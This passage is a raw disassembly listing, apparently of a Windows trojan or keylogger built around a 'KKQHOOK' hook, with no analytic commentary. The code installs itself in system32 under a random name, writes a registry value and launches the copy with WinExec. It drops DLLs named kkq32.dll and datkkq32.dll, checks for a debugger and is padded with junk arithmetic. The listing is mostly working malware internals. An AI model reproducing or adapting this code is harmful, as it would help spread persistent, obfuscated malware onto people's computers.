lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35F0]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_45EF]
push edi
push offset dword_40E010
call sub_4062CD
mov ebx, eax
lea edi, [ebp+var_4742]
lea esi, aSx ; "sx"
mov ecx, 3
rep movsb
lea eax, [ebp+var_600]
push eax
call sub_40C760 ; DeleteFileA
mov [ebp+var_4714], 7F66h
inc [ebp+var_4714]
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 50h
call sub_40C634 ; IsDebuggerPresent
or ebx, ebx
jz short loc_40A0AB
call sub_40C634 ; IsDebuggerPresent
cmp [ebp+var_604], 0
jz short loc_40A0AB
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015EB
add esp, 18h
loc_40A0AB: ; CODE XREF: sub_409847+737�j
; sub_409847+832�j ...
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset dword_413F90
call sub_40C67C ; CreateFileA
mov [ebp+var_4604], eax
mov [ebp+var_45FC], 7514h
mov eax, [ebp+var_45FC]
mov edx, eax
add edx, eax
mov [ebp+var_45FC], edx
cmp [ebp+var_4604], 0FFFFFFFFh
jz loc_40A5BF
mov eax, dword_445B6F
mov [ebp+var_4746], eax
push [ebp+var_4604]
call sub_40C55C ; CloseHandle
mov [ebp+var_4716], 0DEAh
movzx eax, [ebp+var_4716]
imul eax, 4C28h
mov [ebp+var_4716], ax
lea eax, [ebp+var_45EF]
push eax
lea eax, [ebp+var_E08]
push eax
call sub_40CA30
mov [ebp+var_4718], 7CFCh
movzx eax, [ebp+var_4718]
imul eax, 2F59h
mov [ebp+var_4718], ax
push 6
push offset aTRq ; "ݐ"
call sub_40129C
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40CA54
call sub_40C574 ; GetProcessHeap
lea eax, [ebp+var_600]
push eax
call sub_403449
push 1
push offset asc_445DBA ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35F0]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_E08]
push edi
push offset dword_413F90
call sub_4062CD
mov ebx, eax
mov [ebp+var_4719], 18h
movzx eax, [ebp+var_4719]
imul eax, 4B74h
mov [ebp+var_4719], al
lea eax, [ebp+var_600]
push eax
call sub_40C760 ; DeleteFileA
mov [ebp+var_471C], 0F12h
sub [ebp+var_471C], 161h
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 48h
or ebx, ebx
jz short loc_40A21B
call sub_40C508 ; GetCurrentProcessId
push offset dword_413F90
call sub_40C760 ; DeleteFileA
call sub_40C598 ; GetTickCount
loc_40A21B: ; CODE XREF: sub_409847+4FD�j
; sub_409847+9BE�j
cmp [ebp+var_200], 3Ah
jnz loc_40A3F3
cmp [ebp+var_1FD], 3Ah
jnz loc_40A3F3
mov [ebp+var_35F2], 77A0h
inc [ebp+var_35F2]
call sub_40C598 ; GetTickCount
mov [ebp+var_1FD], 0
push 5
push offset aCiaq ; ""
call sub_40129C
lea edi, [ebp+var_35F0]
push edi
push eax
lea edi, [ebp+var_200]
push edi
call sub_40CA48
add esp, 14h
mov [ebp+var_35F4], 28B3h
movzx eax, [ebp+var_35F4]
imul eax, 66EEh
mov [ebp+var_35F4], ax
cmp [ebp+var_35F0], 0
jz short loc_40A2C3
call sub_40CA18
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_35F0]
ja loc_40A56A
loc_40A2C3: ; CODE XREF: sub_409847+A51�j
call sub_40C508 ; GetCurrentProcessId
cmp ds:dword_418680, 2
jnz short loc_40A325
call sub_40C538 ; RtlGetLastWin32Error
push 400h
lea eax, [ebp+var_600]
push eax
call sub_40C580 ; GetSystemDirectoryA
push 0Ah
push offset byte_44658B
call sub_40129C
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_100F]
push edi
call sub_40CA30
push 8
push offset word_446582
call sub_40129C
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA54
add esp, 24h
jmp short loc_40A3A2
; ---------------------------------------------------------------------------
loc_40A325: ; CODE XREF: sub_409847+A88�j
mov eax, dword_445B73
mov [ebp+var_35F8], eax
push 400h
lea eax, [ebp+var_600]
push eax
call sub_40C5C8 ; GetWindowsDirectoryA
mov ax, word_445B77
mov [ebp+var_35FA], ax
push 0Eh
push offset byte_446563
call sub_40129C
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_100F]
push edi
call sub_40CA30
lea edi, [ebp+var_35FD]
lea esi, byte_445B79
mov ecx, 3
rep movsb
push 0Ch
push offset word_446556
call sub_40129C
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA54
add esp, 24h
call sub_40C514 ; GetCurrentThreadId
loc_40A3A2: ; CODE XREF: sub_409847+ADC�j
lea eax, [ebp+var_100F]
push eax
call sub_40C760 ; DeleteFileA
call sub_40C514 ; GetCurrentThreadId
push 8
push offset aINvuni ; "ލ"
call sub_40129C
lea edi, [ebp+var_200]
add edi, 4
push edi
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA30
add esp, 18h
push 0
lea eax, [ebp+var_600]
push eax
call sub_40C724 ; WinExec
call sub_40C514 ; GetCurrentThreadId
loc_40A3F3: ; CODE XREF: sub_409847+9DB�j
; sub_409847+9E8�j
push 5
push offset aN_0 ; "ɍ"
call sub_40129C
mov edi, 0Dh
sub edi, dword_43B098
push edi
push eax
lea edi, [ebp+var_200]
push edi
call sub_401806
add esp, 14h
or eax, eax
jnz loc_40A56A
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_55F7]
lea esi, byte_445B7C
mov ecx, 3
rep movsb
mov eax, dword_43B094
add eax, 5
push eax
lea eax, [ebp+var_F0B]
push eax
call sub_40170F
mov [ebp+var_55F1], 33h
add [ebp+var_55F1], 1
push 9
push offset word_445DFA
call sub_40129C
lea edi, [ebp+var_F0B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_45EB]
push edi
call sub_40CA30
lea eax, [ebp+var_1FB]
push eax
lea eax, [ebp+var_55EA]
push eax
call sub_40C4B8
mov [ebp+var_55F0], 4C44h
mov eax, [ebp+var_55F0]
mov edx, eax
add edx, eax
mov [ebp+var_55F0], edx
push 3
push offset aQ ; "ɟ"
call sub_40129C
mov [ebp+var_55FC], eax
push 1
push offset asc_445DBA ; ""
call sub_40129C
push 0
push 0
push 0
push eax
mov edi, [ebp+var_55FC]
push edi
lea edi, [ebp+var_45EB]
push edi
lea edi, [ebp+var_55EA]
push edi
push 0
call sub_4062CD
add esp, 50h
mov ebx, eax
mov [ebp+var_55F4], 2AB6h
sub [ebp+var_55F4], 2B3Ah
cmp ebx, 2
jnz short loc_40A56A
mov [ebp+var_55FD], 0D1h
add [ebp+var_55FD], 1
push 0
lea eax, [ebp+var_45EB]
push eax
call sub_40C724 ; WinExec
push 6
push offset asc_445D8C ; ""
call sub_40129C
mov edi, 3
sub edi, dword_43B094
push edi
push eax
lea edi, [ebp+var_55EA]
push edi
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jz short loc_40A56A
mov eax, 0Dh
sub eax, dword_43B098
push eax
call sub_40C9DC
pop ecx
loc_40A56A: ; CODE XREF: sub_409847+399�j
; sub_409847+3AA�j ...
lea eax, [ebp+var_200]
push eax
push [ebp+var_608]
push [ebp+var_E0C]
call sub_401B9A
add esp, 0Ch
mov [ebp+var_608], eax
or eax, eax
jnz loc_409BE5
push [ebp+var_E0C]
call sub_40C658 ; LocalFree
mov [ebp+var_102C], 5DFBh
mov eax, 658Bh
mul [ebp+var_102C]
mov [ebp+var_15D8], eax
mov [ebp+var_102C], eax
loc_40A5BF: ; CODE XREF: sub_409847+2FE�j
; sub_409847+36E�j ...
call sub_408BE4
call sub_40C598 ; GetTickCount
fld dbl_445D84
fimul dword_43B0B4
mov edi, eax
call sub_40C410
xchg eax, edi
push edi
call sub_40C9D0
mov edi, dword_43B0B8
sub edi, eax
inc edi
mov [ebp+var_1014], edi
mov [ebp+var_101C], 19AEh
movzx eax, [ebp+var_101C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_101C], ax
mov eax, edi
mov [ebp+var_15DC], eax
push eax
call sub_40C9D0
add esp, 8
mov edi, [ebp+var_15DC]
add edi, eax
mov [ebp+var_1014], edi
mov [ebp+var_102D], 45h
sub [ebp+var_102D], 1Ch
mov eax, edi
mov edi, dword_43B0B8
sub edi, dword_43B0B4
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_15E0], eax
mov [ebp+var_1014], eax
mov [ebp+var_101D], 0DFh
movzx eax, [ebp+var_101D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_101D], al
call sub_40CA18
mov [ebp+var_15E4], eax
mov eax, dword_43B0B4
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov esi, [ebp+var_1014]
mov edx, [ebp+var_15E4]
mov eax, esi
imul eax, [ebp+var_15E4]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_43B0B4, edi
lea edi, [ebp+var_117A]
lea esi, byte_445B7F
mov ecx, 3
rep movsw
mov eax, dword_43B0B8
cmp dword_43B0B4, eax
jbe short loc_40A6ED
and dword_43B0B4, 0
loc_40A6ED: ; CODE XREF: sub_409847+E9D�j
push 30D40h
call sub_40C9B8
pop ecx
jmp loc_4098DE
sub_409847 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A704 proc near ; CODE XREF: sub_40A766+11�p
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
mov ax, word_445B85
mov [ebp+var_A], ax
mov [ebp+var_1], 47h
sub [ebp+var_1], 66h
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 1F0001h
call sub_40C664 ; OpenMutexA
mov [ebp+var_8], eax
or eax, eax
jz short loc_40A763
call sub_40C598 ; GetTickCount
push [ebp+var_8]
call sub_40C55C ; CloseHandle
call sub_40C514 ; GetCurrentThreadId
mov eax, 3
sub eax, dword_43B094
push eax
call sub_40C9DC
pop ecx
mov ax, word_445B87
mov [ebp+var_C], ax
loc_40A763: ; CODE XREF: sub_40A704+2F�j
pop edi
leave
retn
sub_40A704 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A766 proc near ; CODE XREF: sub_40C434+5C�p
var_7F1 = byte ptr -7F1h
var_7EB = byte ptr -7EBh
var_7E9 = byte ptr -7E9h
var_7E8 = dword ptr -7E8h
var_7E2 = word ptr -7E2h
var_7DD = byte ptr -7DDh
var_7DC = dword ptr -7DCh
var_7D7 = byte ptr -7D7h
var_7D0 = byte ptr -7D0h
var_7CC = byte ptr -7CCh
var_7C7 = byte ptr -7C7h
var_7C2 = byte ptr -7C2h
var_7BA = byte ptr -7BAh
var_7B4 = byte ptr -7B4h
var_7B3 = byte ptr -7B3h
var_7AB = dword ptr -7ABh
var_7A7 = dword ptr -7A7h
var_7A3 = byte ptr -7A3h
var_79C = byte ptr -79Ch
var_794 = byte ptr -794h
var_78D = byte ptr -78Dh
var_788 = dword ptr -788h
var_784 = byte ptr -784h
var_783 = byte ptr -783h
var_77E = byte ptr -77Eh
var_67F = byte ptr -67Fh
var_580 = byte ptr -580h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = byte ptr -474h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_366 = word ptr -366h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = byte ptr -35Ch
var_2F8 = byte ptr -2F8h
var_294 = dword ptr -294h
var_28D = byte ptr -28Dh
var_28C = word ptr -28Ch
var_289 = byte ptr -289h
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_272 = word ptr -272h
var_270 = word ptr -270h
var_26E = byte ptr -26Eh
var_16A = word ptr -16Ah
var_168 = dword ptr -168h
var_163 = byte ptr -163h
var_162 = byte ptr -162h
var_5E = word ptr -5Eh
var_5C = dword ptr -5Ch
var_55 = dword ptr -55h
var_51 = dword ptr -51h
var_4D = dword ptr -4Dh
var_49 = dword ptr -49h
var_45 = dword ptr -45h
var_41 = dword ptr -41h
var_3D = dword ptr -3Dh
var_39 = dword ptr -39h
var_35 = dword ptr -35h
var_31 = dword ptr -31h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_1D = byte ptr -1Dh
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7F4h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
call sub_40A704
call sub_40C538 ; RtlGetLastWin32Error
lea edi, [ebp+var_783]
lea esi, aQk ; "qk "
mov ecx, 5
rep movsb
push 104h
lea eax, [ebp+var_162]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_163], 2Ch
movzx eax, [ebp+var_163]
imul eax, 45FBh
mov [ebp+var_163], al
push 13h
push offset dword_445D70
call sub_40129C
push eax
lea edi, [ebp+var_162]
push edi
call sub_40CA54
add esp, 10h
call sub_40C538 ; RtlGetLastWin32Error
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_162]
push eax
call sub_40C67C ; CreateFileA
mov [ebp+var_370], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40A80D
call sub_4085D0
jmp short loc_40A818
; ---------------------------------------------------------------------------
loc_40A80D: ; CODE XREF: sub_40A766+9E�j
push [ebp+var_370]
call sub_40C55C ; CloseHandle
loc_40A818: ; CODE XREF: sub_40A766+A5�j
lea edi, [ebp+var_784]
lea esi, byte_445B8E
xor ecx, ecx
inc ecx
rep movsb
push 9
push offset asc_445D66 ; ""
call sub_40129C
push eax
call sub_40C5D4 ; GlobalAddAtomA
call sub_40C5A4 ; GetVersion
mov eax, [ebp+arg_0]
mov ds:dword_41DA84, eax
mov ds:dword_418670, 94h
push offset dword_418670
call sub_40C5B0 ; GetVersionExA
mov eax, dword_445B8F
mov [ebp+var_788], eax
push 0FFh
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_168], 5BB4h
mov eax, 7833h
mul [ebp+var_168]
mov [ebp+var_7DC], eax
mov [ebp+var_168], eax
call sub_40C598 ; GetTickCount
push eax
call sub_40CA3C
mov [ebp+var_16A], 5032h
add [ebp+var_16A], 7611h
lea edi, [ebp+var_78D]
lea esi, a3hay ; "3hAy"
mov ecx, 5
rep movsb
push 104h
lea eax, [ebp+var_474]
push eax
push [ebp+arg_0]
call sub_40C544 ; GetModuleFileNameA
call sub_40C514 ; GetCurrentThreadId
and [ebp+var_5C], 0
mov [ebp+var_478], 4
mov ebx, 4C9Bh
mov eax, ebx
add eax, ebx
mov ebx, eax
lea eax, [ebp+var_794]
push eax
lea eax, [ebp+var_478]
push eax
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014BD
add esp, 24h
mov [ebp+var_47C], eax
or eax, eax
jz short loc_40A95C
mov [ebp+var_7DD], 57h
add [ebp+var_7DD], 1
cmp [ebp+var_5C], 1Ch
jbe short loc_40A952
mov eax, 0Dh
sub eax, dword_43B098
push eax
call sub_40C9DC
pop ecx
loc_40A952: ; CODE XREF: sub_40A766+1D8�j
cmp [ebp+var_5C], 1Ch
jz loc_40AAD6
loc_40A95C: ; CODE XREF: sub_40A766+1C4�j
lea edi, [ebp+var_79C]
lea esi, a8bTfa ; "<8B=tf"
movsd
movsd
lea edi, [ebp+var_7A3]
lea esi, a_rVnx ; "_r&nx"
mov ecx, 7
rep movsb
call sub_40CA18
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_2D], dl
mov [ebp+var_1], 1
jmp short loc_40A9D4
; ---------------------------------------------------------------------------
loc_40A9A7: ; CODE XREF: sub_40A766+273�j
call sub_40CA18
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_2D], dl
add [ebp+var_1], 1
loc_40A9D4: ; CODE XREF: sub_40A766+23F�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40A9A7
mov [ebp+var_25], 0
call sub_40CA18
mov edx, eax
test dl, 1
jnz short loc_40AA0D
mov [ebp+var_7DD], 0A4h
movzx eax, [ebp+var_7DD]
imul eax, 6B38h
mov [ebp+var_7DD], al
mov [ebp+var_27], 33h
mov [ebp+var_26], 32h
loc_40AA0D: ; CODE XREF: sub_40A766+283�j
push 9
push offset dword_445D5C
call sub_40129C
lea edi, [ebp+var_2D]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_26E]
push edi
call sub_40CA30
push 0
lea eax, [ebp+var_26E]
push eax
lea eax, [ebp+var_474]
push eax
call sub_40C604 ; CopyFileA
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_2D]
push eax
call sub_403C5F
mov [ebp+var_270], 193Ah
sub [ebp+var_270], 3E0Ch
mov [ebp+var_5C], 1Ch
push 4
push 4
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015EB
add esp, 34h
push 0
lea eax, [ebp+var_26E]
push eax
call sub_40C724 ; WinExec
mov eax, dword_445BA7
mov [ebp+var_7A7], eax
call sub_404194
mov [ebp+var_272], 0CB0h
sub [ebp+var_272], 5CCh
mov eax, 3
sub eax, dword_43B094
push eax
call sub_40C4E4 ; ExitProcess
mov eax, dword_445BAB
mov [ebp+var_7AB], eax
loc_40AAD6: ; CODE XREF: sub_40A766+1F0�j
push 5
push offset word_445D56
call sub_40129C
push offset aKkq32_dll ; "kkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_41EA80
call sub_40CA30
mov [ebp+var_278], 57BFh
sub [ebp+var_278], 674Fh
push 5
push offset word_445D56
call sub_40129C
push offset aDnkkq_dll ; "dnkkq.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_40F280
call sub_40CA30
mov [ebp+var_27C], 1B3Dh
sub [ebp+var_27C], 108Ah
push 5
push offset word_445D56
call sub_40129C
push offset aDatkkq32_dll ; "datkkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_40E010
call sub_40CA30
mov [ebp+var_280], 4FE3h
add [ebp+var_280], 4ADFh
push 0FFh
push offset dword_413F90
call sub_40C5C8 ; GetWindowsDirectoryA
call sub_40C598 ; GetTickCount
push 9
push offset byte_445D2B
call sub_40129C
push eax
push offset dword_413F90
call sub_40CA54
call sub_40C598 ; GetTickCount
lea eax, aKkqhook ; "KKQHOOK"
mov [ebp+var_31], eax
mov [ebp+var_281], 0E4h
movzx eax, [ebp+var_281]
imul eax, 3FBBh
mov [ebp+var_281], al
mov eax, ds:dword_41DA84
mov [ebp+var_45], eax
lea eax, sub_40B143
mov [ebp+var_51], eax
push 7F00h
push 0
call sub_40C7C0 ; LoadCursorA
mov [ebp+var_3D], eax
mov [ebp+var_288], 5083h
mov eax, 4FDBh
mul [ebp+var_288]
mov [ebp-7E0h], eax
mov [ebp+var_288], eax
push 7F03h
push 0
call sub_40C7CC ; LoadIconA
mov [ebp+var_41], eax
call sub_40C538 ; RtlGetLastWin32Error
and [ebp+var_35], 0
push 0
call sub_40C8C8 ; GetStockObject
mov [ebp+var_39], eax
mov [ebp+var_55], 3
and [ebp+var_4D], 0
and [ebp+var_49], 0
lea eax, [ebp+var_55]
push eax
call sub_40C7E4 ; RegisterClassA
call sub_40C508 ; GetCurrentProcessId
push 0
push ds:dword_41DA84
push 0
push 0
push 0
push 0
push 0
push 0
push 0CA0000h
push offset aKkqhook ; "KKQHOOK"
push offset aKkqhook ; "KKQHOOK"
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_41B89C, eax
mov [ebp+var_289], 1Dh
add [ebp+var_289], 1
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 0
call sub_40C6C4 ; CreateMutexA
call sub_40C634 ; IsDebuggerPresent
push 2
call sub_402A4D
add esp, 5Ch
call sub_40C634 ; IsDebuggerPresent
call sub_40C5A4 ; GetVersion
cmp eax, 80000000h
jb loc_40AD43
lea edi, [ebp+var_7EB]
lea esi, byte_445BAF
mov ecx, 3
rep movsb
push 0Ch
push offset aUqg ; ""
call sub_40129C
push eax
call sub_40C550 ; GetModuleHandleA
mov edi, eax
push 16h
push offset byte_445D07
call sub_40129C
add esp, 10h
push eax
push edi
call sub_40C568 ; GetProcAddress
mov [ebp+var_7E8], eax
lea edi, [ebp+var_7F1]
lea esi, aVcxs ; "|vCXS"
mov ecx, 3
rep movsw
call sub_40C508 ; GetCurrentProcessId
mov edi, 3
sub edi, dword_43B094
push edi
push eax
call [ebp+var_7E8]
mov [ebp+var_7E2], 1273h
movzx eax, [ebp+var_7E2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_7E2], ax
loc_40AD43: ; CODE XREF: sub_40A766+54B�j
lea edi, [ebp+var_7B3]
lea esi, aWBqy ; " w bqy "
movsd
movsd
push 104h
lea eax, [ebp+var_580]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
lea eax, [ebp+var_580]
push eax
call sub_403449
lea edi, [ebp+var_7B4]
lea esi, byte_445BC0
xor ecx, ecx
inc ecx
rep movsb
push offset dword_41EA80
call sub_403449
mov [ebp+var_28C], 3040h
inc [ebp+var_28C]
push offset dword_40F280
call sub_403449
mov [ebp+var_28D], 0C8h
sub [ebp+var_28D], 2Ch
push offset dword_40E010
call sub_403449
mov [ebp+var_294], 73D3h
add [ebp+var_294], 7F76h
call sub_40C508 ; GetCurrentProcessId
push eax
call sub_4036F2
lea edi, [ebp+var_7BA]
lea esi, aWAs@ ; "W!aS@"
mov ecx, 3
rep movsw
lea edi, [ebp+var_7C2]
lea esi, aLKVm ; "l:K VM~"
mov ecx, 2
rep movsd
lea eax, [ebp+var_2F8]
push eax
call sub_4039D6
and [ebp+var_360], 0
mov [ebp+var_364], 64h
call sub_40C508 ; GetCurrentProcessId
push 45h
push offset byte_445CC1
call sub_40129C
lea edi, [ebp+var_360]
push edi
lea edi, [ebp+var_364]
push edi
lea edi, [ebp+var_35C]
push edi
lea edi, [ebp+var_2F8]
push edi
push eax
push 80000002h
call sub_4014BD
lea edi, [ebp+var_7C7]
lea esi, aScG ; "Sc g"
mov ecx, 5
rep movsb
push 1
push offset byte_445CBF
call sub_40129C
push eax
lea edi, [ebp+var_35C]
push edi
call sub_4037EF
mov [ebp+var_366], 0ABBh
movzx eax, [ebp+var_366]
imul eax, 144Dh
mov [ebp+var_366], ax
push 1
push offset byte_445CBD
call sub_40129C
push eax
lea edi, [ebp+var_2F8]
push edi
call sub_4037EF
lea edi, [ebp+var_7CC]
lea esi, a3sd_ ; "3Sd_"
mov ecx, 5
rep movsb
push 17h
push offset byte_445CA5
call sub_40129C
lea edi, [ebp+var_35C]
push edi
push eax
lea edi, [ebp+var_77E]
push edi
call sub_40CA30
mov [ebp+var_5E], 3CC6h
movzx eax, [ebp+var_5E]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5E], ax
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_67F]
push eax
push 0
lea eax, [ebp+var_77E]
push eax
push 80000000h
call sub_4014BD
mov [ebp+var_36C], 4978h
sub [ebp+var_36C], 4EB6h
lea eax, [ebp+var_67F]
push eax
call sub_403449
call sub_40C538 ; RtlGetLastWin32Error
call sub_403AA3
push offset sub_408189
call sub_40801C
add esp, 8Ch
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_7D0]
push eax
push 0
push 0
push offset sub_409847
push 0
push 0
call sub_40C754 ; CreateThread
push eax
call sub_40C55C ; CloseHandle
lea edi, [ebp+var_7D7]
lea esi, aKT ; "^+k!~T"
mov ecx, 7
rep movsb
push 0
mov eax, dword_43B098
mov edx, eax
add edx, 1E8h
push edx
mov edx, 0Dh
sub edx, eax
push edx
push ds:dword_41B89C
call sub_40C7D8 ; SetTimer
jmp short loc_40B001
; ---------------------------------------------------------------------------
loc_40AFBF: ; CODE XREF: sub_40A766+8AC�j
mov [ebp+var_7E2], 3F2Eh
add [ebp+var_7E2], 0CABh
lea eax, [ebp+var_1D]
push eax
call sub_40C844 ; TranslateMessage
mov [ebp+var_7E8], 5962h
inc [ebp+var_7E8]
lea eax, [ebp+var_1D]
push eax
call sub_40C850 ; DispatchMessageA
mov [ebp+var_7E9], 0B5h
sub [ebp+var_7E9], 2
loc_40B001: ; CODE XREF: sub_40A766+857�j
push 0
push 0
push 0
lea eax, [ebp+var_1D]
push eax
call sub_40C7FC ; GetMessageA
or eax, eax
jnz short loc_40AFBF
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40A766 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B01B proc near ; DATA XREF: sub_408E89+8BD�o
; sub_408E89+8FE�o ...
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_6 = dword ptr -6
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_4]
cmp eax, 100h
jz short loc_40B049
jmp loc_40B0C2
; ---------------------------------------------------------------------------
mov [ebp+var_10], 2420h
add [ebp+var_10], 3723h
loc_40B049: ; CODE XREF: sub_40B01B+19�j
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+arg_8], 9
jnz short loc_40B0C2
cmp edi, ds:dword_410848
jnz short loc_40B067
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
loc_40B067: ; CODE XREF: sub_40B01B+3F�j
mov [ebp+var_14], 134h
mov eax, 33B6h
mul [ebp+var_14]
mov [ebp+var_1C], eax
mov [ebp+var_14], eax
cmp edi, ds:dword_431D04
jnz short loc_40B08F
push ds:dword_41DA7C
call sub_40C7A8 ; SetFocus
loc_40B08F: ; CODE XREF: sub_40B01B+67�j
call sub_40C538 ; RtlGetLastWin32Error
cmp edi, ds:dword_41DA7C
jnz short loc_40B0A7
push ds:dword_41DA74
call sub_40C7A8 ; SetFocus
loc_40B0A7: ; CODE XREF: sub_40B01B+7F�j
mov [ebp+var_15], 71h
add [ebp+var_15], 3Ah
cmp edi, ds:dword_41DA74
jnz short loc_40B0C2
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
loc_40B0C2: ; CODE XREF: sub_40B01B+1B�j
; sub_40B01B+37�j ...
xor esi, esi
cmp edi, ds:dword_431D04
jnz short loc_40B0D2
mov esi, ds:dword_41EA7C
loc_40B0D2: ; CODE XREF: sub_40B01B+AF�j
mov ebx, 74B5h
inc ebx
cmp edi, ds:dword_41DA7C
jnz short loc_40B0E6
mov esi, ds:dword_41DA78
loc_40B0E6: ; CODE XREF: sub_40B01B+C3�j
mov [ebp+var_2], 354Dh
add [ebp+var_2], 3C6Bh
cmp edi, ds:dword_410848
jnz short loc_40B100
mov esi, ds:dword_40E008
loc_40B100: ; CODE XREF: sub_40B01B+DD�j
mov ebx, 6788h
add ebx, 110Ch
cmp edi, ds:dword_41DA74
jnz short loc_40B119
mov esi, ds:dword_413F6C
loc_40B119: ; CODE XREF: sub_40B01B+F6�j
call sub_40C574 ; GetProcessHeap
or esi, esi
jz short loc_40B134
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push edi
push esi
call sub_40C8BC ; CallWindowProcA
jmp short loc_40B13C
; ---------------------------------------------------------------------------
loc_40B134: ; CODE XREF: sub_40B01B+105�j
mov eax, dword_445BE0
mov [ebp+var_6], eax
loc_40B13C: ; CODE XREF: sub_40B01B+117�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B01B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B143 proc near ; DATA XREF: sub_40A766+46A�o
var_27A = word ptr -27Ah
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_248 = byte ptr -248h
var_149 = byte ptr -149h
